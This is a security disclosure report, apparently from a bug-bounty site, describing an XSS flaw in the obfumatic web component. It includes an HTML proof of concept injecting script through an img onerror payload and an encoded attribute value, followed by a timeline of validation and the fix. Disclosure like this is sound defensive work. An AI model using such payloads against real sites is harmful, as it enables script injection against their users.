Potential XSS injection in stuff and say attributes in i40west/obfumatic


Reported on

Jul 15th 2023


The stuff and say attributes are not sanitized before being used in innerHTML. Because of this, they could be used to inject arbitrary JS in the page.

Proof of Concept

<!DOCTYPE html>
<html lang="en">
    <title>obfumatic XSS</title>
    <script type="module" src="obfumatic.js"></script>
    <obfu-matic stuff="SWo0OGFXMW5JSE55WXoxNElHOXVaWEp5YjNJOUoyRnNaWEowS0dCNGMzTWdhVzRnYzNSMVptWmdLU2Mr" say="<img src=x onerror='alert(`xss in say`)'>">Fallback text</obfu-matic>


If a website using this library allows users to generate <obfu-matic> tags (for example in comments), an attacker could use this to inject dangerous JS into the page.

We are processing your report and will contact the i40west/obfumatic team within 24 hours. 5 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
We have contacted a member of the i40west/obfumatic team and are waiting to hear back 4 months ago
i40west/obfumatic maintainer has acknowledged this report 4 months ago
i40west validated this vulnerability 4 months ago
Pierre Rudloff has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
i40west marked this as fixed in 0.1.1 with commit bab057 4 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
i40west published this vulnerability 4 months ago
to join this conversation